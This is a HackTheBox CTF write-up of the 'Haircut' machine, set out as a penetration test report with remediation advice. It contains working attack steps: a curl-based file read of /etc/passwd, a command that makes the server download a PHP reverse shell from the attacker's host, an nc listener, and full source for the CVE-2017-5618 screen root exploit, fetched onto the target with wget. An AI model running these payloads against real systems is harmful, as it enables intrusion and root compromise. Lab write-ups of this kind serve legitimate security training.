Haircut CTF Writeup

Haircut CTF Writeup

Writeup presented by Behind Security as part of the Road to OSCP series, focusing on the Haircut CTF from HackTheBox.

Haircut CTF icon

Haircut CTF

Haircut CTF touches on several useful attack vectors. Most notably, this machine demonstrates the risk of user-specified CURL arguments, which still impacts many active services today.

HackTheBox Logo

HackTheBox

Hack The Box gives individuals, businesses and universities the tools they need to continuously improve their cybersecurity capabilities — all in one place.

Executive Summary

Introduction

This penetration test focused on the IP address 10.10.10.24 with the objective of identifying and assessing vulnerabilities within the target system. The assessment covered service enumeration, web server enumeration, initial access vulnerabilities, and post-exploitation issues.

Objective

The goal of this penetration test was to evaluate the security posture of the target system, identify potential weaknesses, and provide recommendations for mitigating the discovered vulnerabilities.

Requirements

The assessment required thorough testing of the web application hosted at http://10.10.10.24 with a specific emphasis on directory bruteforcing, local file inclusion, and potential remote code execution through arbitrary file upload. Additionally, post-exploitation activities focused on database credentials exposure and local privilege escalation to root.

High-Level Summary of Vulnerabilities

1. Directory Bruteforcing (BS01)

  • Description: Lack of security measures to prevent directory bruteforcing attacks.
  • Severity: Moderate
  • Recommendation: Implement rate limiting or CAPTCHA to mitigate directory bruteforcing attacks.

2. Local File Inclusion (BS02)

  • Description: The exposed.php script is susceptible to Local File Inclusion (LFI) due to user-input arguments in curl commands.
  • Severity: Elevated
  • Recommendation: Sanitize user input in the curl command to prevent LFI attacks.

3. Remote Code Execution (RCE) via Arbitrary File Upload (BS03)

  • Description: The /uploads directory allows arbitrary file uploads, leading to potential RCE.
  • Severity: Extreme
  • Recommendation: Validate file types, restrict uploads, and implement proper input validation.

4. Exposed Database Credentials (BS04)

  • Description: Database root credentials are stored in clear text within the home directory of the "maria" user.
  • Severity: Elevated
  • Recommendation: Encrypt or securely store database credentials and limit access to sensitive information.

5. Local Privilege Escalation to Root (BS05)

  • Description: Outdated vulnerable version (4.5.0) of screen with a SUID bit, susceptible to local privilege escalation.
  • Severity: Extreme
  • Recommendation: Update screen to a non-vulnerable version and regularly patch and update system software.

Recommendations

  1. Implement rate limiting or CAPTCHA to mitigate directory bruteforcing attacks (BS01).
  2. Sanitize user input in the curl command to prevent LFI attacks (BS02).
  3. Validate file types, restrict uploads, and implement proper input validation to prevent RCE via arbitrary file upload (BS03).
  4. Encrypt or securely store database credentials and limit access to sensitive information (BS04).
  5. Update screen to a non-vulnerable version and regularly patch and update system software to prevent local privilege escalation to root (BS05).

Methodology

The assessment employed automated tools such as Feroxbuster for directory bruteforcing and manual testing for LFI, RCE, and privilege escalation vulnerabilities. Post-exploitation activities involved identifying exposed database credentials and exploiting a known vulnerability in the screen utility.

This summary provides an overview of the key findings and recommendations, but further details and steps to reproduce each vulnerability are available in the "Independent Challenge" section.

Color Legend

Standard console text
Commands inputted by the pentester
Text that we want to highlight
{...} Abbreviated output for brevity

Risk Classification

Risk Classification from http://www.pentest-standard.org

Independent Challenge - 10.10.10.24

export IP=10.10.10.24

Service Enumeration

IP AddressPorts Open
10.10.10.24TCP: 22, 80
Nmap scan report

Web Server Enumeration (80/tcp)

BS01 - Directory Bruteforcing

Vulnerability Explanation: No security is in place to prevent directory bruteforcing attacks, allowing an attacker to easily map the directory tree of the web application.

Vulnerability Fix: Implement rate limiting or CAPTCHA to mitigate directory bruteforcing attacks.

Severity: Moderate

Steps to Reproduce the Attack:

  1. Run an automated tool like feroxbuster -u http://10.10.10.24 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -x php.

Additional Comments: Feroxbuster scan output is generally good to read, and it is recursive by default, so whenever it founds another path to follow, it will automatically follow it.

Feroxbuster scan report

BS02 - Local File Inclusion

Vulnerability Explanation: The php script located at http://10.10.10.24/exposed.php is using curl with user-input arguments. This leads to a Local File Inclusion (LFI) vulnerability, as the attacker can pass file:// as input and read local files.

Vulnerability Fix: Sanitize user input in the curl command to prevent LFI attacks.

Severity: Elevated

Steps to Reproduce the Attack:

  1. Go to http://10.10.10.24/exposed.php.
  2. Retrieve local files by providing file:///etc/passwd. You can change /etc/passwd for whatever file you want to read.
Using burpsuite to exploit LFI

BS03 - Initial Access: Remote Code Execution (RCE) via Arbitrary File Upload

Vulnerability Explanation: As previously stated, the script at http://10.10.10.24/exposed.php is using curl with user-supplied arguments. The enumeration of the web server structure pointed in BS01 shows the presence of a /uploads directory, which usually is configured to be world-writable so it can receive uploads. An attacker can use this directory to arbitrarily upload a malicious php script and trick the server into executing it.

Vulnerability Fix: Validate file types and restrict uploads to specific directories. Implement proper input validation.

Severity: Extreme

Steps to Reproduce the Attack:

  1. Download a php reverse shell
  2. Open the script on your favourite text editor and make edit the ip value to your TUN-0 ip address
  3. Host the script using a simple python3 web server: sudo python3 -m http.server 80
  4. Go to http://10.10.10.24/exposed.php and use the following to make the server hit your web server and download the reverse shell to it's /upload folder: http://YOUR-TUN0-IP-ADDRESS/php-reverse-shell.php -o uploads/evil.php
  5. Fire up a netcat listener on port 1234 (if you haven't changed the port value in the php reverse shell): nc -lvnp 1234
  6. Hit the php reverse shell at http://10.10.10.24/uploads/evil.php and enjoy your shell.
Using burpsuite to upload the malicious php shell

Post Exploitation

BS04 - Exposed Database Credentials

Vulnerability Explanation: Database root credentials (user and password) were found in clear text within the home directory of "maria" user.

Vulnerability Fix: Encrypt or securely store database credentials. Limit access to sensitive information.

Severity: Elevated

Steps to Reproduce the Attack:

  1. Run cat /home/maria/.tasks/task1
REDACTED - database password

BS05 - Local Privilege Escalation to Root

Vulnerability Explanation: An outdated version (4.5.0) of screen is present on the system, with a SUID bit. This specific version is vulnerable to a Local Privilege Escalation (LPE) to root by abusing the overwrite of ld.so.preload. The vulnerability is known as CVE-2017-5618.

Vulnerability Fix: Update screen to a non-vulnerable version. Regularly patch and update system software.

Severity: Extreme

Steps to Reproduce the Attack:

  • Paste the following on your local machine's terminal to create libhax.c:
cat << EOF > libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
  • Compile it and remove the c program: gcc -fPIC -shared -ldl -o libhax.so libhax.c && rm -f libhax.c
  • Paste the following on your local machine's terminal to create rootshell.c:
cat << EOF > rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
  • Compile it and remove the c program: gcc -o rootshell rootshell.c && rm -f rootshell.c
  • Create exploit.sh and insert the following using your favourite text editor:
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017) 
echo "~ gnu/screenroot ~"
cd /etc
umask 000
/usr/bin/screen-4.5.0 -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
/usr/bin/screen-4.5.0 -ls # screen itself is setuid, so... 
/tmp/rootshell
  • Run the following to start a http server using python to transfer the compiled programs and the exploit.sh to the victim machine: sudo python3 -m http.server 80
  • Within the victim machine, head to /tmp: cd /tmp and use wget to transfer the exploit files from your machine: wget http://YOUR-TUN0-IP-ADDRESS/rootshell && wget http://YOUR-TUN0-IP-ADDRESS/libhax.so && wget http://YOUR-TUN0-IP-ADDRESS/exploit.sh
  • Mark the exploit as executable and run it: chmod +x exploit.sh && ./exploit.sh. You'll get a root shell.

Conclusion

We hope you have found our content useful and invite you to explore more of our website to discover other interesting topics we cover. From cybersecurity to programming, we strive to provide our readers with the latest and most relevant information that can help them stay informed and ahead of the curve. We are committed to providing the best user experience to you and are open to feedback and suggestions through our contact form. Thank you for choosing Behind Security, we hope to see you again soon! 

Behind Security main logo, cropped.

BEHIND SECURITY

Behind Security is an online platform dedicated to providing informative articles on cybersecurity, privacy, and programming.

Scroll to Top